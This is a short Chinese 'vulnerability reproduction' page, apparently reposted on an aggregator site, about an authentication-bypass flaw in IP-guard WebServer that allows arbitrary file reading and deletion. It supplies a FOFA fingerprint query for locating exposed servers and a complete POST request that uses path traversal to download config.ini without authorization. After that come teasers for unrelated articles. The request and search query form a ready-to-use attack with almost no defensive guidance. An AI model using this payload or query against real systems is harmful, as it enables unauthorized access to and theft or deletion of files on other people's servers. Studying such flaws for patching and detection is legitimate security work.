【漏洞复现】IP-guard WebServer 权限绕过漏洞

server/2024/11/15 8:41:55/

0x01 产品简介

IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分,用于提供 Web 界面以进行用户权限管理、监控和审计。

0x02 漏洞概述

IP-guard WebServer的权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

0x03 测绘语句

fofa: icon_hash="2030860561"

0x04 漏洞复现

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

0x05 影响范围

IP-guard Web

http://www.ppmy.cn/server/25523.html

相关文章

Git泄露和hg泄露原理理解和题目实操

一.Git泄露 1.简介 Git是一个开源的分布式版本控制系统,它可以实现有效控制应用版本,但是在一旦在代码发布的时候,存在不规范的操作及配置,就很可能将源代码泄露出去。那么,一旦攻击者发现这个问题之后,就…

H3C无线AP管理命令

先上链接 01-AP管理命令-新华三集团-H3C display wlan ap all

SpringCloud Hystrix 实战

一、配置 1.引入jar包 单独使用hystrix ,不配合openFegin使用的话,单独使用hystrix,需要引入spring-cloud-starter-netflix-hystrix包。要使用的hystrix-dashboard 界面的话需要引入spring-boot-starter-actuator 包和spring-cloud-starter-netflix-hy…

[电脑软件] 实时打字翻译工具【跨境电商必备软件】

简介 可以边打字边翻译,支持翻译结果直接输出到文本,使用英文输出的朋友会有很大帮助。 目前支持搜狗翻译、百度翻译和有道翻译,支持Windows平台。感兴趣的朋友安装使用~ 目前有2个版本,网页调用版本【推荐】和API版本&#xf…

一篇文章教你使用Docker本地化部署Chatgpt(非api,速度非常快!!!)及裸连GPT的方式(告别镜像GPT)

本地搭建ChatGPT(非api调用) 第一种方法:使用Docker本地化部署第一步,下载安装Docker登录GPT 第二种方法:不部署项目,直接连接 第一种方法:使用Docker本地化部署 这种方法的好处就是没有登录限…

【blender几何节点】制作几何节点生成树

实际上,用pcg功能的工具去搭单个可控制性较强的pcg案例(如单个生成树)而言,确实难度不大。但是要实现诸如speedtree这样通用性比较强的应用or插件(精心设计的诸多可调节参数多带来的强通用性,使其能够适应不…

【skynet】 网络编程之回显服务器

写在前面 skynet 提供了一套 tcp 的 API ,本文将给出简单的回显服务器实现,以及讲解。 文章目录 写在前面编译 skynet服务框架agent_mgragent 注意事项源代码agent_mgr 服务agent 服务配置文件 编译 skynet 拉取 skynet 工程 git clone https://githu…

ElasticSearch笔记一

随着这个业务的发展,我们的数据量越来越庞大。那么传统的这种mysql的数据库就渐渐的难以满足我们复杂的业务需求了。 所以在微服务架构下一般都会用到一种分布式搜索的技术。那么今天呢我们就会带着大家去学习分布搜索当中最流行的一种ElasticSearch,Ela…